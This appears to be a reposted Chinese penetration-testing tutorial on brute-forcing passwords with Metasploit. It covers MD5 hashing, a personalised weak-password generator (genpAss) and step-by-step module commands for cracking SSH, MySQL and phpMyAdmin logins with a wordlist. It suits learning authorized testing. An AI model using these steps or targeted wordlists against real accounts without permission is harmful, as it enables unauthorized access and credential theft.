渗透利器-kali工具 (第五章-3) Metasploit密码爆破模块

本文内容:

  • 常见的加密方式
  • 密码生成工具
  • 查找爆破模块
  • 实战密码爆破

使用MSF的爆破模块进行进一步"信息收集"。

1,常见的加密方式:

  1.MD5加密:
    常用的密码验证算法,用于操作系统登录认证。

    例如:49ba59abbe56e057 [123456]

    明文密码:

      存在规律性

      可破解性

      对应性[撞库]

    密文:

      使用加密算法

      唯一性

      不可伪造性

      不可逆性

    常见的hash加密:

      https://www.jianshu.com/p/0d53b9b5631e

      https://cmd5.com/

    在线工具箱:

      https://tool.bugku.com/

  2.验证hash值:

    Windows自带工具验证hash值:

      certutil /?             查看帮助

      certutil -hashfile 1.jpg MD5   查看文件MD5值

    作用:

      1.验证文件是否损坏

      2.验证文件是否被修改[后门]

    案例:

      https://www.freebuf.com/articles/paper/147403.html (新闻)

      https://www.qianxin.com/other/CVE-2019-0708

2,密码生成工具-genpAss:

  中国特色的弱口令生成器:

  指令:

    -n    命令

    -u    用户名

    -q    QQ号

    -e    邮箱

    -m     手机号

    -b    生日:格式:2001-01-01 

    -c    公司名

    -o    导出文件

  下载地址:https://github.com/RicterZ/genpAss

  安全趣闻:https://www.freebuf.com/sectool/197414.html

  案例:http://www.anquan.us/static/bugs/wooyun-2016-0197071.html

  密码泄露查询:https://haveibeenpwned.com/Passwords 

3,查找 爆破模块:

  查找爆破模块的姿势:

    查找关键字:login  [search type:auxiliary login]

  通过搜索功能快速找到我们想要的模块,缩小范围、精确定位。

    查找服务名:search type:auxiliary name:ssh

    查找服务名+关键字:search type:auxiliary name:phpmyadmin login

4,实战密码爆破:

  通过"信息收集"进行针对性的密码爆破

  1.SSH密码爆破:

    使用模块名:auxiliary/scanner/ssh/ssh_login

    1.查找模块: search type:auxiliary name:ssh

    2.使用模块: use auxiliary/scanner/ssh/ssh_login

    3.查看需设置选项:options   [pass_file,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

    4.设置目标地址:set rhosts 地址[127.0.0.1] 

    5.设置用户名:set username root

    6.设置字典:set pass_file /root/桌面/1.txt  [文件路径+文件名称]

    7.开始爆破:run

  2.MySQL密码爆破:[显示详细结果]

    使用模块名:auxiliary/scanner/mysql/mysql_login

    1.查找模块:search type:auxiliary name:mysql

    2.使用模块:use auxiliary/scanner/mysql/mysql_login

    3.查看设置选项:options  [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

    4.设置目标地址:set rhosts 地址 [127.0.0.1]

    5.设置用户名:set username root

    6.设置密码字典:set pass_file /root/桌面/1.txt  [文件路径+文件名称]

    7.开始爆破:run

  3.phpadmin登录验证爆破:[显示详细结果]

    使用模块名:auxiliary/scanner/http/phpmyadmin_login

    1.查找模块:search type:auxiliary name:phpmyadmin

    2.使用模块:use auxiliary/scanner/http/phpmyadmin_login

    3.查看设置选项:options  [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

    4.设置目标地址:set rhosts 地址[127.0.0.1]

    5.设置端口号:set rport 端口[8080]

    6.设置目标范围:set targeturl phpAdmin/index.php

    7.设置用户名:set username root

    8.设置密码字典:set pass_file /root/桌面/1.txt

    9.开始爆破:run

         

原文地址:https://www.cnblogs.com/xz25/p/12917867.html